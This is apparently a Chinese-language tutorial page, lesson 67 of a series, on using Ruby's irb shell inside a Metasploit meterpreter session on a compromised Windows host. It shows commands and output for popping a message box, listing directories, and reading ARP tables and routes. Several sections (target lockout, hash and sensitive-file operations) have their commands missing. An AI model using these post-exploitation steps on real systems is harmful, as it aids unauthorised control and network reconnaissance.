meterpreter下执行irb进入ruby交互。

    基本的信息搜集:

    锁定注销目标机:

    1. => {"GetLastError"=>0, "ErrorMessage"=>"\xB2\xD9\xD7\xF7\xB3\xC9\xB9\xA6\xCD\xEA\xB3\xC9\xA1\xA3", "return"=>true}
    2. >>

    第六十七课:meterpreter下的irb操作第一季 - 图1

    调用MessageBox:

    1. >> client.railgun.user32.MessageBoxA(0, "Micropoor", "Micropoor", "MB_OK")

    快速获取当前绝对路径:

    目录相关操作:

    1. >> client.fs.dir.chdir("c:\\")
    2. => 0
    3. >> client.fs.dir.entries
    4. => ["ADFS", "AUTOEXEC.BAT", "boot.ini", "bootfont.bin", "CONFIG.SYS", "Documents and Settings", "Inetpub", "IO.SYS", "MSDOS.SYS", "NTDETECT.CO M", "ntldr", "pagefile.sys", "Program Files", "Program Files (x86)", "RECYCLER", "System Volume Information", "WINDOWS", "wmpub"]

    建立文件夹:

    1. => 0

    hash操作:

    第六十七课:meterpreter下的irb操作第一季 - 图2

    1. >> client.net.config.arp_table
    2. => [#<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x000055aee7f5f6b8 @ip_addr="192.168.1.1", @mac_addr="78:44:fd:8e:91:59", @interface="65539">, #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Arp:0x000055aee7f5ee20 @ip_addr="192.168.1.3", @mac_addr="28:16:ad:3b:51:78", @inteface="65539">]
    3. >> client.net.config.arp_table[0].ip_addr
    4. >> => "192.168.1.1"
    5. >> client.net.config.arp_table[0].mac_addr
    6. => "78:44:fd:8e:91:59"
    7. => "65539"
    8. >> client.net.config.routes
    9. => [#<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee789be58 @subnet="0.0.0.0", @netmask="0.0.0.0", @gateway="192.168.1.1",
    10. @interface="65539", @metric=10>,#<Rex::Post::Meterpreter::Extensions::St
    11. dapi::Net::Route:0x000055aee789a7b0 @subnet="127.0.0.0", @netmask="255.0.0.0", @gateway="127.0.0.1", @interface="1", @metric=1>, #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee78993b0 \@subnet="192.168.1.0", @netmask="255.255.255.0", @gateway="192.168.1.119", @interface="65539", @metric=10>, #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee786fec0 @subnet="192.168.1.119", @netmask="255.255.255.255", @gateway="127.0.0.1", @interface="1", @metric=10>,#<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee786e9d0 @subnet="192.168.1.255", @netmask="255.255.255.255", @gateway="192.168.1.119", @inte
    12. rface="65539", @metric=10>, #<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee786d698 @subnet="224.0.0.0", @netmask="240.0.0.0", @gateway="192.168.1.119", @interface="65539", @metric=10>,#<Rex::Post::Meterpreter::Extensions::Stdapi::Net::Route:0x000055aee785be98 @subnet="255.255.255.255", @netmask="255.255.255.255", @gateway="192.168.1.119",
    13. @interface="65539", @metric=1>]

    实战中的敏感文件操作,也是目前最稳定,速度最快的方式:

      更多的敏感文件操作,后续补充。

      第六十七课:meterpreter下的irb操作第一季 - 图3

      更多相关的api操作在未来的课时中介绍。